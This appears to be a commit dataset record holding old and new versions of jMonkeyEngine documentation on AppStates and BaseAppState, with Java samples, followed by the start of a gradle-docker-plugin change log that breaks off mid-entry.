=== Supported Features\n\nEach AppState lets you define what happens to it in the following situations:\n\n* *The AppState is initialized:* You load and initialize game data, InputHandlers, AppStates and Controls and attach nodes. +\nThe AppState executes its own simpleInitApp() method when it is attached, so to speak.\n* *The AppState has been enabled (unpaused):* This toggles a boolean isEnabled() to true. Here you attach nodes and listeners that should become active while it's running.\n* *While the AppState is running\/paused:* You can poll isEnabled() to define paused and unpaused game behaviour in the update() loop. In update(), you poll and modify the game state, modify the scene graph, and trigger events. Test if `!isEnabled()`, and write code that skips the running sections of this AppState's `update()` loop. +\nEach AppState has its own update loop, which hooks into the main simpleUpdate() loop (callback).\n* *The AppState has been disabled (paused):* This toggles a boolean isEnabled() to false. Here you switch all objects to their specific \"`paused`\" behaviour.\n* *The AppState is cleaned up:* Here you decide what happens when the AppState is detached. Save this AppState's game state, unregister Controls and InputHandlers, detach related AppStates, detach nodes from the rootNode, etc.\n\n\n[TIP]\n====\nAppStates are extremely handy for swapping out, or pausing\/unpausing, whole sets of other AppStates. For example, an InGameState (loads in-game +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++, activates click-to-shoot input mappings, inits game content, starts game loop) versus MainScreenState (stops game loop, saves and detaches game content, switches to menu screen +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++, switches to click-to-select input mappings).\n====\n\n\n\n=== Usage\n\nTo implement game logic:\n\n. Create one AbstractAppState instance for each set of game mechanics.\n. Implement game behaviour in the AppState's update() method.\n** You can pass custom data as arguments in the constructor.\n** The AppState has access to everything inside the app's scope via the Application `app` object.\n\n. Create and attach the AppState to the AppStateManager (`stateManager.attach(myAppState);`) and initialize it.\n. Enable and disable (unpause and pause) the AppStates that you need during the game.\n. Detach the AppState from the AppStateManager (`stateManager.detach(myAppState);`) and clean it up.\n\nWhen you add several AppStates to one Application and activate them, their initialize() methods and update() loops are executed in the order in which the AppStates were added to the AppStateManager.\n\n\n=== Code Samples\n\nJME3 comes with a BulletAppState that implements physics behaviour (using the jBullet library). For example, you could write an Artificial Intelligence AppState to control all your enemy units. 
Existing examples in the code base include:\n\n* link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-bullet\/src\/common\/java\/com\/jme3\/bullet\/BulletAppState.java[BulletAppState] controls physical behaviour in PhysicsControl'ed Spatials.\n* link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/app\/state\/TestAppStates.java[TestAppStates.java] an example of a custom AppState\n** link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/app\/state\/RootNodeState.java[RootNodeState.java]\n\n\n\n== AppState\n\nThe AppState interface lets you initialize sets of objects, and hook a set of continuously executing code into the main loop.\n[cols=\"25,75\", options=\"header\"]\n|===\n\na|AppState Method\na|Usage\n\na|initialize(asm,app)\na|When this AppState is added to the game, the RenderThread initializes the AppState and then calls this method. You can modify the scene graph from here (e.g. attach nodes). To get access to the main app, call:\n[source,java]\n----\nsuper.initialize(stateManager, app);\nthis.app = (SimpleApplication) app;\n----\n\n\na|cleanup()\na|This method is executed after you remove the AppState from the game. Here you implement clean-up code for when this state is detached. You can modify the scene graph from here (e.g. detach nodes).\n\na|update(float tpf)\na|Here you implement the behaviour that you want to hook into the simpleUpdate() loop while this state is attached to the game. You can modify the scene graph from here.\n\na|isInitialized()\na|Your implementations of this interface should return the correct respective boolean value. (See AbstractAppState)\n\na|setEnabled(true) +\nsetEnabled(false)\na|Temporarily enables or disables an AppState. (See AbstractAppState)\n\na|isEnabled()\na|Test whether AppState is enabled or disabled. Your implementation should consider the boolean. (See AbstractAppState)\n\na|stateAttached(asm) +\nstateDetached(asm)\na|The AppState knows when it is attached to, or detached from, the AppStateManager, and triggers these two methods. Don't modify the scene graph from here! (Typically not used.)\n\na|render(RenderManager rm)\na|Renders the state, plus your optional customizations. (Typically not used.)\n\na|postRender()\na|Called after all rendering commands are flushed, including your optional customizations. (Typically not used.)\n\n|===\n\n\n== AbstractAppState\n\nThe link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-core\/src\/main\/java\/com\/jme3\/app\/state\/AbstractAppState.java[AbstractAppState] class already implements some common methods (`isInitialized(), setEnabled(), isEnabled()`) and makes creation of custom AppStates a bit easier. 
We recommend you extend AbstractAppState and override the remaining AppState methods: `initialize(), setEnabled(), cleanup()`.\n\nDefinition:\n\n[source,java]\n----\npublic class MyAppState extends AbstractAppState {\n\n private SimpleApplication app;\n\n private Node x = new Node(\"x\"); \/\/ some custom class fields...\n public Node getX(){ return x; } \/\/ some custom methods...\n\n @Override\n public void initialize(AppStateManager stateManager, Application app) {\n super.initialize(stateManager, app);\n this.app = (SimpleApplication)app; \/\/ cast to a more specific class\n\n \/\/ init stuff that is independent of whether state is PAUSED or RUNNING\n this.app.getRootNode().attachChild(getX()); \/\/ modify scene graph...\n this.app.doSomething(); \/\/ call custom methods...\n }\n\n @Override\n public void cleanup() {\n super.cleanup();\n \/\/ unregister all my listeners, detach all my nodes, etc...\n this.app.getRootNode().detachChild(getX()); \/\/ modify scene graph...\n this.app.doSomethingElse(); \/\/ call custom methods...\n }\n\n @Override\n public void setEnabled(boolean enabled) {\n \/\/ Pause and unpause\n super.setEnabled(enabled);\n if(enabled){\n \/\/ init stuff that is in use while this state is RUNNING\n this.app.getRootNode().attachChild(getX()); \/\/ modify scene graph...\n this.app.doSomethingElse(); \/\/ call custom methods...\n } else {\n \/\/ take away everything not needed while this state is PAUSED\n ...\n }\n }\n\n \/\/ Note that update is only called while the state is both attached and enabled.\n @Override\n public void update(float tpf) {\n \/\/ do the following while game is RUNNING\n this.app.getRootNode().getChild(\"blah\").scale(tpf); \/\/ modify scene graph...\n x.setUserData(...); \/\/ call some methods...\n }\n\n}\n----\n\n\n== BaseAppState\n\nA new link:{link-javadoc}\/com\/jme3\/app\/state\/BaseAppState.html[BaseAppState] class was introduced as part of the link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine-3-1-alpha-4-released\/35478[updates] being made to the AppState interface. AbstractAppState is the most minimal implementation of the AppState interface. You essentially still need to do everything yourself, including getting the funky enable\/disable\/initialized\/terminate logic right. Now you just extend BaseAppState and you get onEnable() and onDisable() already worked out for you.\n\nDefinition:\n\n[source,java]\n----\npublic class MyBaseAppState extends BaseAppState {\n @Override\n protected void initialize(Application app) {\n \/\/It is technically safe to do all initialization and cleanup in the\n \/\/onEnable()\/onDisable() methods. Choosing to use initialize() and\n \/\/cleanup() for this is a matter of performance specifics for the\n \/\/implementor.\n \/\/TODO: initialize your AppState, e.g. attach spatials to rootNode\n }\n\n @Override\n protected void cleanup(Application app) {\n \/\/TODO: clean up what you initialized in the initialize method,\n \/\/e.g. 
remove all spatials from rootNode\n }\n\n \/\/onEnable()\/onDisable() can be used for managing things that should\n \/\/only exist while the state is enabled. Prime examples would be scene\n \/\/graph attachment or input listener attachment.\n @Override\n protected void onEnable() {\n \/\/Called when the state is fully enabled, ie: is attached and\n \/\/isEnabled() is true or when the setEnabled() status changes after the\n \/\/state is attached.\n }\n\n @Override\n protected void onDisable() {\n \/\/Called when the state was previously enabled but is now disabled\n \/\/either because setEnabled(false) was called or the state is being\n \/\/cleaned up.\n }\n\n @Override\n public void update(float tpf) {\n \/\/TODO: implement behavior during runtime\n }\n\n}\n----\n\nNotable BaseAppState changes are as follows:\n\n\n* You no longer need to call super.initialize(stateManager, app) because it is now called by BaseAppState upon initialization for you.\n* You no longer have to cast SimpleApplication to have access to AssetManager, AppStateManager, and you can even get a State directly. The getters getApplication(), getAssetManager(), getState(type) and their methods are available to you immediately. However, you still have to cast SimpleApplication to get rootNode.\n* You no longer call super during cleanup, it's done for you now.\n* It's now safe to do all initialization and cleanup in the onEnable()\/onDisable() methods.\n* Cleanup and setEnabled now have logging built in.\n\nApart from the differences mentioned above, you use BaseAppState just as you would AbstractAppState; which one you use is entirely up to you. However, BaseAppState makes your life easier and is the recommended one to use now.\n\nSee link:http:\/\/javadoc.jmonkeyengine.org\/com\/jme3\/app\/state\/BaseAppState.html[BaseAppState] for more information.\n\n== Pausing and Unpausing\n\nYou define what an AppState does when paused or unpaused in the `setEnabled()` and `update()` methods. Call `myState.setEnabled(false)` on all states that you want to pause. Call `myState.setEnabled(true)` on all states that you want to unpause.\n\n
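For instance, a pause toggle could look like the following sketch (the state classes `EnemyAiState` and `PhysicsState` are hypothetical placeholders):\n\n[source,java]\n----\npublic void setPaused(boolean paused) {\n \/\/ Pause or unpause a whole group of states in one step:\n stateManager.getState(EnemyAiState.class).setEnabled(!paused);\n stateManager.getState(PhysicsState.class).setEnabled(!paused);\n}\n----\n\n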
== AppStateManager\n\nThe com.jme3.app.state.AppStateManager holds the list of AppStates for an application. AppStateManager ensures that active AppStates can modify the scene graph, and that the update() loops of active AppStates are executed. There is one AppStateManager per application. You typically attach several AppStates to one AppStateManager, but the same state can only be attached once.\n[cols=\"2\", options=\"header\"]\n|===\n\na|AppStateManager Method\na|Usage\n\na|hasState(myState)\na|Is AppState object 'myState' attached?\n\na|getState(MyAppState.class)\na|Returns the first attached state that is an instance of a subclass of `MyAppState.class`.\n\n|===\n\nThe AppStateManager's `render(), postRender(), cleanup()` methods are internal; ignore them, users never call them directly.\n\n* If a detached AppState is attached then initialize() will be called on the following render pass.\n* If an attached AppState is detached then cleanup() will be called on the following render pass.\n* If you attach an already-attached AppState then the second attach is a no-op and will return false.\n* If you both attach and detach an AppState within one frame then neither initialize() nor cleanup() will be called, although if either is called both will be.\n* If you both detach and then re-attach an AppState within one frame then on the next update pass its cleanup() and initialize() methods will be called in that order.\n\n\n== Best Practices\n\n\n=== Communication Among AppStates\n\nYou can only access other AppStates (read from and write to them) from certain places: from a Control's update() method, from an AppState's update() method, and from the SimpleApplication's simpleUpdate() loop. Don't mess with the AppState from other places, because from other methods you have no control over the order of modifications; the game can go out of sync because you can't know when (during which half-finished step of another state change) your modification will be performed.\n\nYou can use custom accessors to get data from AppStates, to set data in AppStates, or to trigger methods in AppStates.\n\n[source,java]\n----\nthis.app.getStateManager().getState(MyAppState.class).doSomeCustomStuffInThisState();\n----\n\n\n=== Initialize Familiar Class Fields\n\nTo access class fields of the SimpleApplication the way you are used to, initialize them to local variables, as shown in the following AppState template:\n\n[source,java]\n----\n\nprivate SimpleApplication app;\nprivate Node rootNode;\nprivate AssetManager assetManager;\nprivate AppStateManager stateManager;\nprivate InputManager inputManager;\nprivate ViewPort viewPort;\nprivate BulletAppState physics;\n\npublic class MyAppState extends AbstractAppState {\n @Override\n public void initialize(AppStateManager stateManager, Application app) {\n super.initialize(stateManager, app);\n this.app = (SimpleApplication) app; \/\/ can cast Application to something more specific\n this.rootNode = this.app.getRootNode();\n this.assetManager = this.app.getAssetManager();\n this.stateManager = this.app.getStateManager();\n this.inputManager = this.app.getInputManager();\n this.viewPort = this.app.getViewPort();\n this.physics = this.stateManager.getState(BulletAppState.class);\n }\n}\n\n----\n","old_contents":"= Application States\n:author:\n:revnumber:\n:revdate: 2016\/03\/17 20:48\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\n:experimental:\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nThe `com.jme3.app.state.AppState` class is a customizable jME3 interface that allows you to control the global game logic, the overall game mechanics. (To control the behaviour of a Spatial, see <<jme3\/advanced\/custom_controls#,Custom Controls>> instead. 
Controls and AppStates can be used together.)\n\n\n== Overview\n\n\n=== Use Case Examples\n\nThere are situations during your game development where you think:\n\n* Mouse and key inputs are handled differently in-game versus in the main menu. Can I group a set of input handler settings, and activate and deactivate them all in one step?\n* I have the in-game scene, and a character editor, and a Captain's Quarters screen. Can I group a set of nodes and behaviours, and swap them in and out in one step?\n* When I pause the game, I want the character's \"`idle`\" animation to continue, but all other loops and game events should stop. How do I define what happens when the game is paused\/unpaused?\n* I have a conditional block that takes up a lot of space in my simpleUpdate() loop. Can I wrap up this block of code, and switch it on and off in one step?\n* Can I package everything that belongs in-game, and everything that belongs to the menu screen, and switch between these two \"`big`\" states in one step?\n\nYou can! This is what AppStates are there for. An AppState class is subset of (or an extension to) your application. Every AppState class has access to all fields in your main application (AssetManager, ViewPort, StateManager, InputManager, RootNode, GuiNode, etc) and hooks into the main update loop. An AppState can contain:\n\n* a subset of class fields, functions, methods (game state data and accessors),\n* a subset of +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++ elements and their listeners,\n* a subset of input handlers and mappings,\n* a subset of nodes that you load and attach to the rootNode,\n* a subset of conditional actions that you branch to in the simpleUpdate() loop,\n* a subset of other AppStates and Controls\n* \u2026 or combinations thereof.\n\n\n=== Supported Features\n\nEach AppState lets you define what happens to it in the following situations:\n\n* *The AppState is initialized:* You load and initialize game data, InputHandlers, AppStates and Controls and attach nodes. +\nThe AppState executes its own simpleInitApp() method when it is attached, so to speak.\n* *The AppState has been enabled (unpaused):* This toggles a boolean isEnabled() to true. Here you attach nodes and listeners that should become active while it's running.\n* *While the AppState is running\/paused:* You can poll isEnabled() to define paused and unpaused game behaviour in the update() loop. In update(), you poll and modify the game state, modify the scene graph, and trigger events. Test if `!isEnabled()`, and write code that skips the running sections of this AppState's `update()` loop. +\nEach AppState has its own update loop, which hooks into the main simpleUpdate() loop (callback).\n* *The AppState has been disabled (paused):* This toggles a boolean isEnabled() to false. Here you switch all objects to their specific \"`paused`\" behaviour.\n* *The AppState is cleaned up:* Here you decide what happens when the AppState is detached. Save this AppState's game state, unregister Controls and InputHandlers, detach related AppStates, detach nodes from the rootNode, etc.\n\n\n[TIP]\n====\nAppStates are extremely handy to swap out, or pause\/unpause whole sets of other AppStates. 
For example, an InGameState (loads in-game +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++, activates click-to-shoot input mappings, inits game content, starts game loop) versus MainScreenState (stops game loop, saves and detaches game content, switches to menu screen +++<abbr title=\"Graphical User Interface\">GUI<\/abbr>+++, switches to click-to-select input mappings).\n====\n\n\n\n=== Usage\n\nTo implement game logic:\n\n. Create one AbstractAppState instance for each set of game mechanics.\n. Implement game behaviour in the AppState's update() method.\n** You can pass custom data as arguments in the constructor.\n** The AppState has access to everything inside the app's scope via the Application `app` object.\n\n. Create and attach the AppState to the AppStateManager (`stateManager.attach(myAppState);`) and initialize it.\n. Enable and disable (unpause and pause) the AppStates that you need during the game.\n. Detach the AppState from the AppStateManager (`stateManager.detach(myAppState);`) and clean it up.\n\nWhen you add several AppStates to one Application and activate them, their initialize() methods and update() loops are executed in the order in which the AppStates were added to the AppStateManager.\n\n\n=== Code Samples\n\nJME3 comes with a BulletAppState that implements Physical behaviour (using the jBullet library). You, for example, could write an Artificial Intelligence AppState to control all your enemy units. Existing examples in the code base include:\n\n* link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-bullet\/src\/common\/java\/com\/jme3\/bullet\/BulletAppState.java[BulletAppState] controls physical behaviour in PhysicsControl'ed Spatials.\n* link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/app\/state\/TestAppStates.java[TestAppStates.java] an example of a custom AppState\n** link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-examples\/src\/main\/java\/jme3test\/app\/state\/RootNodeState.java[RootNodeState.java]\n\n\n\n== AppState\n\nThe AppState interface lets you initialize sets of objects, and hook a set of continuously executing code into the main loop.\n[cols=\"25,75\", options=\"header\"]\n|===\n\na|AppState Method\na|Usage\n\na|initialize(asm,app)\na|When this AppState is added to the game, the RenderThread initializes the AppState and then calls this method. You can modify the scene graph from here (e.g. attach nodes). To get access to the main app, call:\n[source,java]\n----\nsuper.initialize(stateManager, app);\nthis.app = (SimpleApplication) app;\n----\n\n\na|cleanup()\na|This method is executed after you remove the AppState from the game. Here you implement clean-up code for when this state is detached. You can modify the scene graph from here (e.g. detach nodes).\n\na|update(float tpf)\na|Here you implement the behaviour that you want to hook into the simpleUpdate() loop while this state is attached to the game. You can modify the scene graph from here.\n\na|isInitialized()\na|Your implementations of this interface should return the correct respective boolean value. (See AbstractAppState)\n\na|setEnabled(true) +\nsetEnabled(false)\na|Temporarily enables or disables an AppState. (See AbstractAppState)\n\na|isEnabled()\na|Test whether AppState is enabled or disabled. Your implementation should consider the boolean. 
(See AbstractAppState)\n\na|stateAttached(asm) +\nstateDetached(asm)\na|The AppState knows when it is attached to, or detached from, the AppStateManager, and triggers these two methods. Don't modify the scene graph from here! (Typically not used.)\n\na|render(RenderManager rm)\na|Renders the state, plus your optional customizations. (Typically not used.)\n\na|postRender()\na|Called after all rendering commands are flushed, including your optional customizations. (Typically not used.)\n\n|===\n\n\n== AbstractAppState\n\nThe link:https:\/\/github.com\/jMonkeyEngine\/jmonkeyengine\/blob\/master\/jme3-core\/src\/main\/java\/com\/jme3\/app\/state\/AbstractAppState.java[AbstractAppState] class already implements some common methods (`isInitialized(), setEnabled(), isEnabled()`) and makes creation of custom AppStates a bit easier. We recommend you extend AbstractAppState and override the remaining AppState methods: `initialize(), setEnabled(), cleanup()`.\n\nDefinition:\n\n[source,java]\n----\npublic class MyAppState extends AbstractAppState {\n\n private SimpleApplication app;\n\n private Node x = new Node(\"x\"); \/\/ some custom class fields...\n public Node getX(){ return x; } \/\/ some custom methods...\n\n @Override\n public void initialize(AppStateManager stateManager, Application app) {\n super.initialize(stateManager, app);\n this.app = (SimpleApplication)app; \/\/ cast to a more specific class\n\n \/\/ init stuff that is independent of whether state is PAUSED or RUNNING\n this.app.getRootNode().attachChild(getX()); \/\/ modify scene graph...\n this.app.doSomething(); \/\/ call custom methods...\n }\n\n @Override\n public void cleanup() {\n super.cleanup();\n \/\/ unregister all my listeners, detach all my nodes, etc...\n this.app.getRootNode().detachChild(getX()); \/\/ modify scene graph...\n this.app.doSomethingElse(); \/\/ call custom methods...\n }\n\n @Override\n public void setEnabled(boolean enabled) {\n \/\/ Pause and unpause\n super.setEnabled(enabled);\n if(enabled){\n \/\/ init stuff that is in use while this state is RUNNING\n this.app.getRootNode().attachChild(getX()); \/\/ modify scene graph...\n this.app.doSomethingElse(); \/\/ call custom methods...\n } else {\n \/\/ take away everything not needed while this state is PAUSED\n ...\n }\n }\n\n \/\/ Note that update is only called while the state is both attached and enabled.\n @Override\n public void update(float tpf) {\n \/\/ do the following while game is RUNNING\n this.app.getRootNode().getChild(\"blah\").scale(tpf); \/\/ modify scene graph...\n x.setUserData(...); \/\/ call some methods...\n }\n\n}\n----\n\n\n== BaseAppState\n\n\nA new link:{link-javadoc}\/app\/state\/BaseAppState.html[BaseAppState] class was introduced as part of the link:https:\/\/hub.jmonkeyengine.org\/t\/jmonkeyengine-3-1-alpha-4-released\/35478[updates] being made to the AppState interface. AbstractAppState is the most minimal of the minimal implementations of the AppState interface. You essentially still need to do everything yourself, including getting the funky enable\/disable\/initialized\/terminate logic right. 
Now you just extend BaseAppState and you get onEnable() and onDisable() already worked out for you.\n\nDefinition:\n\n[source,java]\n----\npublic class MyBaseAppState extends BaseAppState {\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\n @Override\u00a0\u00a0\u00a0\n protected void initialize(Application app) {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/It is technically safe to do all initialization and cleanup in the \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/onEnable()\/onDisable() methods. Choosing to use initialize() and \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/cleanup() for this is a matter of performance specifics for the \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/implementor.\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/TODO: initialize your AppState, e.g. attach spatials to rootNode\u00a0\u00a0\u00a0\n }\n\n @Override\u00a0\u00a0\u00a0\n protected void cleanup(Application app) {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/TODO: clean up what you initialized in the initialize method,\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/e.g. remove all spatials from rootNode\u00a0\u00a0\u00a0\n }\n\n \u00a0 \/\/onEnable()\/onDisable() can be used for managing things that should \u00a0\u00a0\u00a0\n \/\/only exist while the state is enabled. Prime examples would be scene \u00a0\u00a0\u00a0\n \/\/graph attachment or input listener attachment.\u00a0\u00a0\u00a0\n @Override\u00a0\u00a0\u00a0\n protected void onEnable() {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/Called when the state is fully enabled, ie: is attached and \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/isEnabled() is true or when the setEnabled() status changes after the \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/state is attached.\u00a0\u00a0\u00a0\n }\n \u00a0 \u00a0\n \u00a0 @Override\u00a0\u00a0\u00a0\n protected void onDisable() {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/Called when the state was previously enabled but is now disabled \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/either because setEnabled(false) was called or the state is being \u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/cleaned up.\u00a0\u00a0\u00a0\n }\u00a0\u00a0\u00a0 \u00a0\u00a0\u00a0\n\n @Override\u00a0\u00a0\u00a0\n public void update(float tpf) {\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\n \/\/TODO: implement behavior during runtime\u00a0\u00a0\u00a0\n }\n \u00a0 \u00a0\n}\n----\n\nNotable BaseAppState changes are as follows:\n\n\n* You no longer need to call super.initialize(stateManager, app) because it is now called by BaseAppState upon initialization for you.\n* You no longer have to cast SimpleApplication to have access to AssetManager, AppStateManager, and you can even get a State directly. The getters getApplication(), getAssetManager(), getState(type) and their methods are available to you immediately. However, you still have to cast SimpleApplication to get rootNode.\n* You no longer call super during cleanup, its done for you now.\n* It's now safe to do all initialization and cleanup in the onEnable()\/onDisable() methods.\n* Cleanup and setEnabled now have logging built in.\n\nYou use BaseAppState as you would AbstractAppState, other than mentioned above, and which one you use is entirely up to you. 
However, BaseAppState makes your life easier and is the recommended one to use now.\n\nSee link:http:\/\/javadoc.jmonkeyengine.org\/com\/jme3\/app\/state\/BaseAppState.html[BaseAppState] for more information.\n\n== Pausing and Unpausing\n\nYou define what an AppState does when Paused or Unpaused, in the `setEnabled()` and `update()` methods. Call `myState.setEnabled(false)` on all states that you want to pause. Call `myState.setEnabled(true)` on all states that you want to unpause.\n\n\n== AppStateManager\n\nThe com.jme3.app.state.AppStateManager holds the list of AppStates for an application. AppStateManager ensures that active AppStates can modify the scene graph, and that the update() loops of active AppStates is executed. There is one AppStateManager per application. You typically attach several AppStates to one AppStateManager, but the same state can only be attached once.\n[cols=\"2\", options=\"header\"]\n|===\n\na|AppStateManager Method\na|Usage\n\na|hasState(myState)\na|Is AppState object 'myState' attached?\n\na|getState(MyAppState.class)\na|Returns the first attached state that is an instance of a subclass of `MyAppState.class`.\n\n|===\n\nThe AppStateManager's `render(), postRender(), cleanup()` methods are internal, ignore them, users never call them directly.\n\n* If a detached AppState is attached then initialize() will be called on the following render pass.\n* If an attached AppState is detached then cleanup() will be called on the following render pass.\n* If you attach an already-attached AppState then the second attach is a no-op and will return false.\n* If you both attach and detach an AppState within one frame then neither initialize() or cleanup() will be called, although if either is called both will be.\n* If you both detach and then re-attach an AppState within one frame then on the next update pass its cleanup() and initialize() methods will be called in that order.\n\n\n== Best Practices\n\n\n=== Communication Among AppStates\n\nYou can only access other AppStates (read from and write to them) from certain places: From a Control's update() method, from an AppState's update() method, and from the SimpleApplication's simpleUpdate() loop. 
Don't mess with the AppState from other places, because from other methods you have no control over the order of modifications; the game can go out of sync because you can't know when (during which half-finished step of another state change) your modification will be performed.\n\nYou can use custom accessors to get data from AppStates, to set data in AppStates, or to trigger methods in AppStates.\n\n[source,java]\n----\nthis.app.getStateManager().getState(MyAppState.class).doSomeCustomStuffInThisState();\n----\n\n\n=== Initialize Familiar Class Fields\n\nTo access class fields of the SimpleApplication the way you are used to, initialize them to local variables, as shown in the following AppState template:\n\n[source,java]\n----\n\nprivate SimpleApplication app;\nprivate Node rootNode;\nprivate AssetManager assetManager;\nprivate AppStateManager stateManager;\nprivate InputManager inputManager;\nprivate ViewPort viewPort;\nprivate BulletAppState physics;\n\npublic class MyAppState extends AbstractAppState {\n @Override\n public void initialize(AppStateManager stateManager, Application app) {\n super.initialize(stateManager, app);\n this.app = (SimpleApplication) app; \/\/ can cast Application to something more specific\n this.rootNode = this.app.getRootNode();\n this.assetManager = this.app.getAssetManager();\n this.stateManager = this.app.getStateManager();\n this.inputManager = this.app.getInputManager();\n this.viewPort = this.app.getViewPort();\n this.physics = this.stateManager.getState(BulletAppState.class);\n }\n}\n\n----\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"11271bb2f37d488365c00fc00864c809595474eb","subject":"Add change to release notes","message":"Add change to release notes\n","repos":"bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin,bmuschko\/gradle-docker-plugin","old_file":"src\/docs\/asciidoc\/50-changes.adoc","new_file":"src\/docs\/asciidoc\/50-changes.adoc","new_contents":"== Change Log\n\n[discrete]\n=== v6.1.0 (TBA)\n\n* Allow configuring the main class name for convention plugins - {uri-github}\/pull\/892[PR 892]\n\n[discrete]\n=== v6.0.0 (November 16, 2019)\n\n* **Breaking Change!** Multi-tag support for push operation and convention plugins - {uri-github}\/pull\/867[PR 867]\n* **Breaking Change!** Renamed property `tags` to `images` for extensions `DockerJavaApplication` and `DockerSpringBootApplication`.\n* **Breaking Change!** Renamed property `tag` to `image` for custom tasks `DockerBuildImage`, `DockerCommitImage`, `DockerPullImage`, `DockerSaveImage`, `DockerListImages`,`DockerCreateContainer`.\n* **Breaking Change!** Removal of method `DockerPullImage.getImageId()`. 
Use `DockerPullImage.getImage()` instead.\n* **Breaking Change!** Host-related configuration properties in `DockerCreateContainer` have been moved to a nested property for better maintainability - {uri-github}\/pull\/873[PR 873]\n* Add properties `ipcMode` and `sysctls` to `DockerCreateContainer` - {uri-github}\/pull\/862[PR 862]\n* Gradle 6.0 compatibility fixes - {uri-github}\/pull\/869[PR 869]\n* Improve DSL for configuring registry credentials for custom tasks - {uri-github}\/pull\/879[PR 879]\n* Plugin resolves and uses Docker credential helper - {uri-github}\/pull\/865[PR 865]\n* Upgrade of Docker Java library to version 3.1.5\n\n[discrete]\n=== v5.3.0 (October 30, 2019)\n\n* Expose project-prop\/sys-prop\/env-var to optionally use netty-exec-cmd-factory - {uri-github}\/pull\/876[PR 876]\n\n[discrete]\n=== v5.2.0 (October 5, 2019)\n\n* **Potentially Breaking Change!** Remove duplicated code in convention plugins - {uri-github}\/pull\/864[PR 864]\n* Restore compatibility with Gradle 5.1 as runtime version - {uri-github}\/issue\/866[Issue 866]\n\n[discrete]\n=== v5.1.0 (September 18, 2019)\n\n* **Potentially Breaking Change!** Remove remaining use of Application Plugin in convention plugins - {uri-github}\/pull\/852[PR 852]\n\n[discrete]\n=== v5.0.0 (August 13, 2019)\n\n* **Breaking Change!** Remove exec\/cmd hooks in Docker application plugin - {uri-github}\/pull\/806[PR 806]\n* **Breaking Change!** API cleanup of Dockerfile task - {uri-github}\/pull\/812[PR 812]\n* **Breaking Change!** Removed `ItemJoiner` from public API - {uri-github}\/pull\/836[PR 836]\n* Respect symlinks in build context - {uri-github}\/issue\/837[Issue 837]\n\n[discrete]\n=== v4.10.0 (June 12, 2019)\n\n* Expose `target` property for BuildImageTask - {uri-github}\/pull\/813[PR 813]\n* Remove final from DockerBuildImage.labels property - {uri-github}\/pull\/823[PR 823]\n* Always set imageId within DockerBuildImage on success - {uri-github}\/pull\/819[PR 819]\n\n[discrete]\n=== v4.9.0 (May 25, 2019)\n\n* Avoid memory leakage by replacing addShutdownHook with Gradle.buildFinished - {uri-github}\/pull\/810[PR 810]\n* `DockerBuildImage` will print whole lines by collecting output and waiting for newline - {uri-github}\/pull\/799[PR 799]\n* `DockerBuildImage` reinstated ImageId output file and check in Docker registry - {uri-github}\/pull\/807[PR 807]\n\n[discrete]\n=== v4.8.1 (May 11, 2019)\n\n* Introduce `maintainer` property to extension of Spring Boot application plugin - {uri-github}\/issues\/779[Issue 779]\n* **Breaking Change!** Removed `RepositoriesFallbackPlugin` that was applied automatically - {uri-github}\/issues\/794[Issue 794]\n* **Breaking Change!** The Docker client in `AbstractDockerRemoteApiTask` is not injected into the method `runRemoteCommand` anymore - {uri-github}\/issues\/802[Issue 802]\n\n[discrete]\n=== v4.8.0 (April 22, 2019)\n\n* Expose extension property for configuring JVM arguments - {uri-github}\/pull\/790[PR 790]\n\n[discrete]\n=== v4.7.1 (April 13, 2019)\n\n* **Breaking Change!** The existing field `timeout` in custom tasks had to be renamed due to https:\/\/docs.gradle.org\/5.0\/userguide\/more_about_tasks.html#sec:task_timeouts[Gradle's 5.0 built-in timeout feature] and has been replaced with `waitTime`.\n\n[discrete]\n=== v4.7.0 (April 9, 2019)\n\n* Tasks created by convention plugins should assign a task group - {uri-github}\/issues\/768[Issue 768]\n* Main class detection should work with a Kotlin-based application - {uri-github}\/issues\/766[Issue 766]\n* Fix gradle `5.x` deprecation 
